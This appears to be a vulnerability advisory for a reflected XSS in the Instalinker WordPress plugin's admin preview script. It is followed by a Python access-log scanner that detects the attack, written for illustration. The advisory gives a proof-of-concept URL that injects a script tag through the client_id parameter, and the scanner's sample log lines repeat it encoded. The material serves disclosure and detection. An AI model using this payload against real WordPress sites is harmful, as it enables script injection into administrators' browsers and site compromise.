EPSS Percentile: 32.7%
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user’s browser and potentially compromise the WordPress installation.
http://www.example.com/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php?client_id="><script>alert(1);</script><div data-il-client-id="
rastating.github.io/instalinker-reflected-xss-information-disclosure
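
A log check for the request described above, added here as an example and not taken from the advisory or the plugin: it flags access-log entries that hit the preview script with a `client_id` whose decoded value contains quote or angle-bracket characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter name come from the advisory.
VULN_PATH = "/wp-content/plugins/instalinker/includes/instalinker-admin-preview.php"
PARAM = "client_id"
# Characters that let a value escape a quoted HTML attribute or open a tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET ' + VULN_PATH
    + '?client_id=abc123def456 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /blog' + VULN_PATH
    + '?client_id=%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3Cdiv%20'
    + 'data-il-client-id%3D%22 HTTP/1.1" 200 640',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php'
    + '?client_id=%22%3E HTTP/1.1" 200 900',
]


def suspicious_client_id(log_line):
    """Return the decoded client_id when the line is a request to the preview
    script carrying attribute-breaking characters, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not unquote(url.path).lower().endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes once, matching what PHP places in $_GET.
    for value in parse_qs(url.query).get(PARAM, []):
        if BREAKOUT.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_client_id(line)
        if value is not None:
            hits.append((number, value))
    return hits
```

A hit means the request was made, not that a script ran in an administrator's browser; correlate flagged lines with the referrer and the session that issued them.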